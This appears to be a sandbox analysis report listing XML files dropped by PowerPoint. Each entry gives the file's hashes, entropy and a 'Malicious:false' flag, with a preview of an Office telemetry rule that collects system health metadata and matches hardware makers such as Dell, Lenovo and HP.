                                                                                                                              SHA1:6898C564C66D16A75799A5BFB3832B95A94753B6
                                                                                                                              SHA-256:E1FB5F88AE974497FCD412A7A8F66C110561CD7572D636559121208275AA9AF9
                                                                                                                              SHA-512:E637E8700EB316624CC052BD80E186B03B70C1EFD26A989365FA4670377E1C58FBB6F134990668E1449DFED98022B0ECD714148F4E663A666D2FCE77A9CE2283
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120501" V="17" DC="SM" T="Subrule" xmlns="">.. <S>.. <UCSS T="1" C="Scope Summary" S="Medium" />.. <F T="2">.. <O T="NE">.. <L>.. <S T="1" F="ULS_Tag" />.. </L>.. <R>.. <V V="5777345" T="U32" />.. </R>.. </O>.. </F>.. <F T="3">.. <O T="AND">.. <L>.. <O T="NE">.. <L>.. <S T="2" F="ULS_Tag" />.. </L>.. <R>.. <V V="19239242" T="U32" />.. </R>.. </O>.. </L>.. <R>.. <O T="NE">.. <L>.. <S T="2" F="ULS_Tag" />.. </L>.. <R>.. <V V="8439428" T="U32" />.. </R>.. </O>.. </R>.. </O>.. </F>.. <F T="4">.. <O T="AND">.. <L>.. <O T="NE">.. <L>.. <S T="3" F="ULS_Tag" />.. </L>.. <R>.. <V V="921
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2979
                                                                                                                              Entropy (8bit):4.991513830301989
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:c8L1wcNgUZNZDhC5PrGHYzZGCXhf1by0/h9Jr9Jm6:HpH/DczQyZlhjJpJm6
                                                                                                                              MD5:F4BFD86F423200624CFA7666B17EECC5
                                                                                                                              SHA1:92C7C980BDE67E323AB603A9858FF24809731289
                                                                                                                              SHA-256:97D1DC756F573B50991802038087FAF9BA0C977709F86E2816DD481ECF01F861
                                                                                                                              SHA-512:9E773A74D4AE6E3285192F4B41A31CD14A93D47AA5E37CDA31E952C0805E7A868F19CE7F20EEFC65D62E56C6D09F0AE03ED2AB59447A45AA184DBE52A259B701
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns="">.. <RIS>.. <RI N="Metadata" />.. </RIS>.. <S>.. <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" />.. <R T="2" R="120681" />.. </S>.. <C T="W" I="0" O="true" N="ProcTypeText">.. <S T="1" F="ProcessorArchitecture" />.. </C>.. <C T="U32" I="1" O="true" N="ProcessorCount">.. <S T="1" F="ProcessorCount" />.. </C>.. <C T="U32" I="2" O="true" N="NumProcShareSingleCore">.. <S T="1" F="NumProcShareSingleCore" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="NumProcShareSingleCache">.. <S T="1" F="NumProcShareSingleCache" M="Ignore" />.. </C>.. <C T="U32" I="4" O="true" N="NumProcPhysCores">.. <S T="1" F="NumProcPhysCores" M="Ignore" />.. </C>.. <C T="U32" I="5" O="true" N="ProcSpeedMHz">..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3341
                                                                                                                              Entropy (8bit):4.997102990206506
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dqzdiIq4lVJd572lGA7CzB5HAqlAc/R4R32rN/u2IXCT/22/lHicLNZblqv:cSEwx5ilbK5HAqlAhR2rX2o2ulicL5qv
                                                                                                                              MD5:4D044861F6A92FC6F38F5C9A7805896A
                                                                                                                              SHA1:4468FBBCE74A3F076BEC8007AC5B316E881BE5E9
                                                                                                                              SHA-256:B5CBCCBA164E2157ED98CE01790C1D5ADB6AFB544676E5907657A02A8F770A64
                                                                                                                              SHA-512:3EB41A3706196B5CABF659BB5A748BC383041320CA81C3E25249457FC58F4D64B2FD53C92A3BF3D6A10733E8C2E652357B7DCAC472B73262CF4BCD44364F4190
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns="">.. <RIS>.. <RI N="Metadata" />.. </RIS>.. <S>.. <SS T="1" G="{3cb9b55e-dede-4e53-a8fb-237e71d0c1ad}" />.. <SS T="2" G="{233c7b3b-96db-42f9-9cd7-2a3dc93947e8}" />.. <SS T="3" G="{8ab2d942-dc47-4076-8a16-0c8b6874be27}" />.. <R T="4" R="120100" />.. </S>.. <C T="U32" I="0" O="true" N="OsMajorVer">.. <S T="1" F="OSMajorVer" M="Ignore" />.. </C>.. <C T="U32" I="1" O="true" N="OsMinorVer">.. <S T="1" F="OSMinorVer" M="Ignore" />.. </C>.. <C T="U32" I="2" O="true" N="OsBuild">.. <S T="1" F="OSBuildNumber" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="OsBuildRevision">.. <S T="1" F="OSBuildRevision" M="Ignore" />.. </C>.. <C T="U16" I="4" O="true" N="OsSuite2">.. <S T="1" F="OSSuite2" M="Ignore" />.. </C
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2590
                                                                                                                              Entropy (8bit):5.075257657360688
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dmdHA2rIqVloWI7+EegleGOexv94g+Z9sCfdOcwbikA2VkwekmNqO7QEzemm4EM:cmDF/LcreGNh2hYUkXu3bSZ1U4o
                                                                                                                              MD5:BDF7A85D77A7A9A08217C0CB325CE529
                                                                                                                              SHA1:FDB99B6FCFCB3A1FADC7F2BF3FA732066DCA7CCE
                                                                                                                              SHA-256:DE6571CE52A60192E70D8E4C643DFEE986D4E2D6C5CA9CF023DC5F257AD8A41C
                                                                                                                              SHA-512:7DB95EEEA4A3A4C8AED6201E79B0D816AEC9A92833E70252AB29D665F47D0D192BB8BB3AF0F425099341E9B7587386017EC54BD05520E5D0668EB984B08AEE61
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120602" V="8" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="PSU" xmlns="">.. <RIS>.. <RI N="Metadata" />.. </RIS>.. <S>.. <SS T="1" G="{68442bc6-3519-4b08-a80c-e0a68fc8cda3}" />.. <SS T="2" G="{8e685dc2-78f7-47e1-9a99-6a636773669a}" />.. <R T="3" R="120100" />.. </S>.. <C T="U16" I="0" O="true" N="Click2RunPackageVersionBuild">.. <S T="1" F="PackageVersionBuild" M="Ignore" />.. </C>.. <C T="U16" I="1" O="true" N="Click2RunPackageVersionMajor">.. <S T="1" F="PackageVersionMajor" M="Ignore" />.. </C>.. <C T="U16" I="2" O="true" N="Click2RunPackageVersionMinor">.. <S T="1" F="PackageVersionMinor" M="Ignore" />.. </C>.. <C T="U16" I="3" O="true" N="Click2RunPackageVersionRevision">.. <S T="1" F="PackageVersionUpdate" M="Ignore" />.. </C>.. <C T="W" I="4" O="true" N
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2128
                                                                                                                              Entropy (8bit):5.104787639829218
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:JdJdHjIqUlsGjPvy3iFcKaXbPICtKuQqo1ZKTvCkqy8qGHwxF0soh/N0aeZ44L:3JrMsGjPvy3IMLt4MTIaGj4L
                                                                                                                              MD5:C0CD509AF6E12FC3D2A441B81F550999
                                                                                                                              SHA1:732988232E7D2CFF964008A510C5F58034E45C89
                                                                                                                              SHA-256:C3C7819FE42F83FAF7508BBB4A184B429C0DC8926050D5BECB20FF4F73E1782A
                                                                                                                              SHA-512:BAE01A8FE637DDF65503DDB0B67FA16C7BF4FBC45B023DDB5E5BD916A775D63F9E49A2E3E6E099EC6577E7EAC0C0FDAEC3F443162D6AED9D06BBCAEFE37DA9BB
                                                                                                                              Malicious:false
                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<R Id="120603" V="8" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAdditional" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" E="false" DL="A" DCa="PSU" xmlns="">.. <RIS>.. <RI N="Metadata" />.. </RIS>.. <S>.. <SS T="1" G="{c3d2f3fc-0f86-43ac-b7a3-007bf524f38f}" />.. <SS T="2" G="{1f59c07e-f223-4c7f-aa23-df28da66734b}" />.. <SS T="3" G="{dd5250a9-3404-43b0-9b7a-6f4eaea6497d}" />.. <SS T="4" G="{1a6b5bd0-2f17-420c-8ba0-ee01132ee441}" />.. <SS T="5" G="{6b5515e4-c848-4ef0-92d4-747ecc491c7b}" />.. <R T="6" R="120100" />.. <R T="7" R="120607" />.. </S>.. <C T="FT" I="0" O="true" N="FirstRunTime">.. <S T="1" F="FirstRunTime" M="Ignore" />.. </C>.. <C T="W" I="1" O="true" N="Alias">.. <S T="3" F="Alias" M="Ignore" />.. </C>.. <C T="B" I="2" O="true" N="IsLabMachine">.. <S T="3" F="IsLabMachine" M="Ignore" />.. </C>.. <C T="B" I="3" O=
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2230
                                                                                                                              Entropy (8bit):5.090316412928055
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dkvdHjIqUlsGjPvy3iFcKaXbPICtKuQqo1ZKTvCkqy8qGHwxF0soh/N0aeZ48De:cSrMsGjPvy3IMLt4MTIaGj8De
                                                                                                                              MD5:C2A4ABFDD24022353511FF1DFA07D76F
                                                                                                                              SHA1:974905183127597728B513519A44F20E912C511E
                                                                                                                              SHA-256:1877E128F35F857DA624F829894397A1C70D2B9CF10854445F1F34252AD9F835
                                                                                                                              SHA-512:41D08B73CE5B1C31805AEFB165D34580D9642AC65189EEAD7E1A0AD6F603EABA667A0EE1BDF70A5FFF1EAEB90C3960E6743BA56CF7486F699B13AB45A47AC4A5
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120603" V="9" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAdditional" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" E="false" DL="A" DCa="PSU" xmlns="">.. <RIS>.. <RI N="Metadata" />.. </RIS>.. <S>.. <SS T="1" G="{c3d2f3fc-0f86-43ac-b7a3-007bf524f38f}" />.. <SS T="2" G="{1f59c07e-f223-4c7f-aa23-df28da66734b}" />.. <SS T="3" G="{dd5250a9-3404-43b0-9b7a-6f4eaea6497d}" />.. <SS T="4" G="{1a6b5bd0-2f17-420c-8ba0-ee01132ee441}" />.. <SS T="5" G="{6b5515e4-c848-4ef0-92d4-747ecc491c7b}" />.. <R T="6" R="120100" />.. <R T="7" R="120607" />.. </S>.. <C T="FT" I="0" O="true" N="FirstRunTime">.. <S T="1" F="FirstRunTime" M="Ignore" />.. </C>.. <C T="W" I="1" O="true" N="Alias">.. <S T="3" F="Alias" M="Ignore" />.. </C>.. <C T="B" I="2" O="true" N="IsLabMachine">.. <S T="3" F="IsLabMachine" M="Ignore" />.. </C>.. <C T="B" I="3" O="tr
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):424
                                                                                                                              Entropy (8bit):4.591118413981684
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdyqxuOeF/iuSspS7PNWEVxf/0//8hmMNOjsu:2dQFrSTP5P2
                                                                                                                              MD5:96AB38CED32FE5BC21C378A66F08532E
                                                                                                                              SHA1:41753CBDD215BAE6A1C7545F09176774206BB394
                                                                                                                              SHA-256:9AC1918D35B0D3EBB5234BF4506EC6CA554563D973F97747FEC09F08A43E7443
                                                                                                                              SHA-512:33482117C8E464E9AB8FD24C21897BD855A61B9299F53713FDF561B31EDEDF2247CD6E3288199E7CEF99239C6EBB68FF84096BEEB51D42ECB2A794CF45A45472
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120604" V="1" DC="SM" T="Subrule" S="1" xmlns="">.. <S>.. <SS T="1" G="{1a6b5bd0-2f17-420c-8ba0-ee01132ee441}" />.. <R T="2" R="120100" />.. </S>.. <C T="W" I="0" O="true">.. <O T="COALESCE">.. <L>.. <S T="1" F="UserCid" M="Ignore" />.. </L>.. <R>.. <V V="" T="W" />.. </R>.. </O>.. </C>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):876
                                                                                                                              Entropy (8bit):4.651543954286572
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdwoPlbPwYHyj3vAQ4mlwyuOeF/i3iceuXlOaNeQfH/M//05eNX/c//bfpONyZ:2dLdbIqSlYFIDsgR7
                                                                                                                              MD5:04DBBB154D35DB709278DA22934FBD28
                                                                                                                              SHA1:31B5F7D46DB191C41E617AA1CEABD7F1B14105CA
                                                                                                                              SHA-256:79064CF51492A1089C52A3D89442A724A9B9C728F57BE750CF94B25BD8F14B06
                                                                                                                              SHA-512:CDFD76800A394B58BE52044E2370C13C1C11248D0C7F5D0F467151087C01F3774E1E79E7F47C55120D09DA330785F8C103B1055CA97914F82F3FDC758FBBD7E5
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120605" V="0" DC="SM" EN="Office.System.SystemHealthMetadataDelayedLogin" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" S="1" DL="A" DCa="PSU" xmlns="">.. <RIS>.. <RI N="Metadata" />.. </RIS>.. <S>.. <SS T="1" G="{1a6b5bd0-2f17-420c-8ba0-ee01132ee441}" />.. <R T="2" R="120604" />.. <R T="3" R="120125" />.. <TH T="4">.. <O T="AND">.. <L>.. <O T="EQ">.. <L>.. <S T="2" F="0" />.. </L>.. <R>.. <V V="" T="W" />.. </R>.. </O>.. </L>.. <R>.. <S T="3" F="0" />.. </R>.. </O>.. </TH>.. </S>.. <C T="W" I="0" O="true" N="CID">.. <S T="1" F="UserCid" M="Ignore" />.. </C>.. <T>.. <S T="4" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):203
                                                                                                                              Entropy (8bit):4.878690652619822
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:vFWWMNHU8LdgCcsp780670B6f7TDsdKuNFeiehYH1gkkrPgKbo5K55xbSJNaKqBz:TMVBd7/n8fQerhsCrPPb/On2sby
                                                                                                                              MD5:DBB52AF4488BAB09B2089BE57282F58F
                                                                                                                              SHA1:4CB6B84A9A211030C1E6E97A820BF4C16CDF0941
                                                                                                                              SHA-256:FADB57E240685960C16DC6A779DA5F9510DCB56A878F73FF2903E96A1AF5DB62
                                                                                                                              SHA-512:674AF27936D4739C00FBEF4797722C65B1C1DDB85E7EF38927744902A6E0779D4F2B35F80530C1D6B30FF14E1170127D57C5504141A7216AF79A08CB342DCC77
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120607" V="1" DC="SM" T="Subrule" ER="120603" xmlns="">.. <S>.. <UTS T="1" Id="bbpzs" A="940tc 9x5js" />.. </S>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2159
                                                                                                                              Entropy (8bit):3.9073233641894265
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2do8OUuFjFejNFqdxCS6/SIBoxJQRxtamqNMw+Fq6cemM+SOP0x+7:c9u8ACBuUtajwq6dmM+L7
                                                                                                                              MD5:7867D966455B59074A704388D170319D
                                                                                                                              SHA1:264B4219FB6D879E05333D12A9D395D5F78DD59B
                                                                                                                              SHA-256:8A1104C088B17EEE6640EB6408993729A1758AF2AA1346E1826E55BC362F52A1
                                                                                                                              SHA-512:1AB68121782297C19EE112D15DFDC2EDD0C0367769057B7CCD223C7A5CBDCAF7F167A59E21054AF279EC4EA5140117D1098BB8BE61436940B8962DB9464CB34F
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns="">.. <S>.. <R T="1" R="120609" />.. <R T="2" R="120679" />.. <R T="3" R="120610" />.. <R T="4" R="120612" />.. <R T="5" R="120614" />.. <R T="6" R="120616" />.. <R T="7" R="120618" />.. <R T="8" R="120620" />.. <R T="9" R="120622" />.. <R T="10" R="120624" />.. <R T="11" R="120626" />.. <R T="12" R="120628" />.. <R T="13" R="120630" />.. <R T="14" R="120632" />.. <R T="15" R="120634" />.. <R T="16" R="120636" />.. <R T="17" R="120638" />.. <R T="18" R="120640" />.. <R T="19" R="120642" />.. <R T="20" R="120644" />.. <R T="21" R="120646" />.. <R T="22" R="120648" />.. <R T="23" R="120650" />.. <R T="24" R="120652" />.. <R T="25" R="120654" />.. <R T="26" R="120656" />.. <R T="27" R="120658" />.. <R T="28" R="120660" />.. <R T="29" R="120662" />.. <R T="30" R="120664" />.. <R T="31" R="120666" />..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):407
                                                                                                                              Entropy (8bit):4.6572794887278315
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd7ubi0xe4nC/p4SPeEdsV7C/5YHM9ndtq+/B49NOn2sby:TMHdKbi0x9SpFDspS5ndrBkNO2su
                                                                                                                              MD5:65B69E5A3B7F2A8B6F88821E1E123C35
                                                                                                                              SHA1:62D4EB4D1E8B5B0BE1F757ED53E860AA8B65D078
                                                                                                                              SHA-256:14577CC263D559DFF7390FB015A4589C20B911EE43D00E9B6E005023BF0A3BE2
                                                                                                                              SHA-512:184DA76286B0CB195AB067055F9A75D81893649BE4A9DFB2E7F0A7D49B4CA0214C4CB3813C9A76C1D3777FCE9B7AE00114CA0DE2E5D4F267EB6F65D892DE7B3A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120609" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120682" />.. <SR T="2" R="^([Dd][Ee][Ll][Ll])">.. <S T="1" F="0" M="Ignore" />.. </SR>.. </S>.. <C T="W" I="0" O="true">.. <S T="2" F="Matched" M="Ignore" />.. </C>.. <C T="W" I="1" O="false">.. <S T="1" F="0" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):473
                                                                                                                              Entropy (8bit):4.205975317519947
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdUbi06T/qNOm/hFsNX/c//bLMpONyuRiNOjsu:2dmKyeiWqN
                                                                                                                              MD5:06E0531C2FB1D1F39CDB8D7AD05D6408
                                                                                                                              SHA1:B3096D90E1FAD9B8D7F50B7FCE122051074BBB5C
                                                                                                                              SHA-256:EF4969810EF7F911935B3AC916E727643C20AACC4B483ED331FFC0DFE9D58E45
                                                                                                                              SHA-512:C118B9644C50BDB6AAD81CEBF6B870D4404F815A48A127D960631FBE9507B5DD7D7CB55A9D956924F5890FEA61CD00DBA3235D0CD16F032A8BE5AC26CBFD23BA
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120610" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120609" />.. <TH T="2">.. <O T="EQ">.. <L>.. <U T="EqualsNull">.. <S T="1" F="0" M="Ignore" />.. </U>.. </L>.. <R>.. <V V="false" T="B" />.. </R>.. </O>.. </TH>.. </S>.. <C T="W" I="0" O="false">.. <V V="Dell Inc." T="W" />.. </C>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):414
                                                                                                                              Entropy (8bit):4.674386030617272
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd76UlNbi0vSPMA4UM+xfq/HJSPeEdsV7C/5YHM9ndtq+/vJ9NOn2sby:TMHdjLbi06Ogf64DspS5ndrvNO2su
                                                                                                                              MD5:339C1D489F7328CF786AF8E671978A2B
                                                                                                                              SHA1:BBB21DFF74E109C1E5A72CC28750ECA3EDC6C06B
                                                                                                                              SHA-256:BF551F2EB7D335B2F871675231CE845D9F4F58E581420338D0359B95628AD821
                                                                                                                              SHA-512:0A9A1D0610CE60D613B11FA6D3B79981A207C3A1D6F6A82DBA41BA2826D444AFDBEBDAEF8C40DA69762F3973F0BA192CC06DE6B5B105109928E4A8B8C7293476
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120611" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120609" />.. <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])">.. <S T="1" F="1" M="Ignore" />.. </SR>.. </S>.. <C T="W" I="0" O="true">.. <S T="2" F="Matched" M="Ignore" />.. </C>.. <C T="W" I="1" O="false">.. <S T="1" F="1" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):470
                                                                                                                              Entropy (8bit):4.1951580617514095
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdGNbi05/T/qNOm/hFsNX/c//bLMpONyuoNOjsu:2dw5yeiWu
                                                                                                                              MD5:412318ABA58BFAAE19C99C7E2746E2CC
                                                                                                                              SHA1:1C5A03125695AB61229AC5F2B1571A006D69E279
                                                                                                                              SHA-256:7E2DEAE7BC8BE274D0B75A233102FCF1D5B5487C18CC2A3A8ED0A54C96D35114
                                                                                                                              SHA-512:E6A3E16B9265DA2C008387675E0BB8C893DD20FFBA9A51FD0CEDF6CC2567400B01B593D613BFFEE3CC5C4374320824FC9A83881CF41C88762A683A434E390CA0
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120612" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120611" />.. <TH T="2">.. <O T="EQ">.. <L>.. <U T="EqualsNull">.. <S T="1" F="0" M="Ignore" />.. </U>.. </L>.. <R>.. <V V="false" T="B" />.. </R>.. </O>.. </TH>.. </S>.. <C T="W" I="0" O="false">.. <V V="LENOVO" T="W" />.. </C>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):631
                                                                                                                              Entropy (8bit):4.603788936312325
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdhbi05/QN4WGQ+ThE4DspS7PNWJYf/0//W1YhmMdrvNO2su:2dba8Q4hHTPCQ9ux
                                                                                                                              MD5:4348787B7D3D0DC035A61705FB5AB249
                                                                                                                              SHA1:22EC17C43B0A9D97F023FDD74279266A6E582396
                                                                                                                              SHA-256:EEA55FD50EDE40F4BB8362A61357E0DEF8A77EADFDB20738FE27F8CCB2743411
                                                                                                                              SHA-512:1BFFBB7A1218D5227AFD4D5850124A54E72F79057F0F1B7A772D1290D3CA402B06A338C48E66162960B0E9A406039F950F2144A17DB3B78F25079966128E4440
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120613" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120611" />.. <SR T="2" R="^([Hh][Pp]([^E]|$))">.. <S T="1" F="1" M="Ignore" />.. </SR>.. <SR T="3" R="([Hh][Ee][Ww][Ll][Ee][Tt][Tt])">.. <S T="1" F="1" M="Ignore" />.. </SR>.. </S>.. <C T="W" I="0" O="true">.. <O T="COALESCE">.. <L>.. <S T="2" F="Matched" M="Ignore" />.. </L>.. <R>.. <S T="3" F="Matched" M="Ignore" />.. </R>.. </O>.. </C>.. <C T="W" I="1" O="false">.. <S T="1" F="1" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):466
                                                                                                                              Entropy (8bit):4.193004288778686
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd/Ybi0LT/qNOm/hFsNX/c//bLMpONyuLNOjsu:2d/CnyeiWX
                                                                                                                              MD5:35DFCC791A845C64421189331497A661
                                                                                                                              SHA1:B45B4BE4F4C71516B536858A710588EC10DF8820
                                                                                                                              SHA-256:BE994BE8685B883E806FEAEDADD305F1E1949824AFD110A16EAFB57F185A91AE
                                                                                                                              SHA-512:2DAE5627BF694FF59CFA77DD5DB117787DBA5F0877D2376D7798244C8506D2E937970197069B542663E3B7328F2CDC70F086E0D62D45CECC5180D8C8A638A63A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120614" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120613" />.. <TH T="2">.. <O T="EQ">.. <L>.. <U T="EqualsNull">.. <S T="1" F="0" M="Ignore" />.. </U>.. </L>.. <R>.. <V V="false" T="B" />.. </R>.. </O>.. </TH>.. </S>.. <C T="W" I="0" O="false">.. <V V="HP" T="W" />.. </C>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):406
                                                                                                                              Entropy (8bit):4.632533717029051
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd76QpZbi0YW/Q/HJSPeEdsV7C/5YHM9ndtq+/vJ9NOn2sby:TMHdnLbi0LQ4DspS5ndrvNO2su
                                                                                                                              MD5:B90B9BE6A7BAC1711DEE5CE232B2E94D
                                                                                                                              SHA1:3F10EF69424146FECBBEC7CA150C2ABA2012CDD0
                                                                                                                              SHA-256:8A0E4470CD864756A275B4AA1031DDC5DA5F23EE15F2F32E7471486706D4FAE8
                                                                                                                              SHA-512:D8BADD17C6E79D0CB5C2587E2E2AF6AE6CC953EB37A6528275F2E4ED27FFD061B17533A84F7191D1E2F8DDCEE41060C4D8BF0A5B574DF92CDA4B1D7EDED50F97
                                                                                                                              Malicious:false
